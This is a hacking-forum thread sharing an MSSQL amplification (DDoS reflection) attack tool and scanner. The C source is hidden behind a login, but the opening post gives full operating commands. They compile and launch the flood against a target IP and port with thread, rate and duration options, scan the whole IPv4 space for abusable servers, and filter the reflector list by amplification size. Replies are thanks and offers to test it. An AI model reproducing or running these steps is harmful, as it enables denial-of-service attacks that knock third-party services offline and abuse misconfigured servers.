ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 9869

[C] MSSQL Attack & Scanner Script

by LucasYegorov - 10-06-2016 - 02:41 AM
#1
MSSQL Amplification Attack & Scanner Script

Hidden Content
You must register or login to view this content.



Tutorial

Sending Attack -
gcc -o mssql mssql.c -pthread; rm -rf mssql.c
./mssql <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>
ex: ./mssql 37.25.14.31 80 mssql.txt 1 -1 300

Scanning Reflection File
gcc -o mssqlscan mssqlscan.c -pthread; rm -rf mssqlscan.c
./mssqlscan <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>
ex: ./mssqlscan 1.0.0.0 255.255.255.255 mssql.txt 3 5

Filtering Reflection File -
cat mssql.txt |awk '{if($2>300)print $1}' | sort -u > out.txt; rm -rf mssql.txt; mv out.txt mssql.txt
[Image: py063Fi.png]
Reply
#2
(10-06-2016 - 02:41 AM)LucasYegorov Wrote: MSSQL Amplification Attack & Scanner Script


This is so cool, definitely going to take a gander bud!

Thank you <3
Reply
#3
ty bruh <3 , nice share btw
Reply
#4
ive got a jtag contact me and ill test it
Reply
#5
Thx for you ♥ eieio
Reply
#6
Thank you man :)

This is decent thanks
Reply

Users browsing: 1 Guest(s)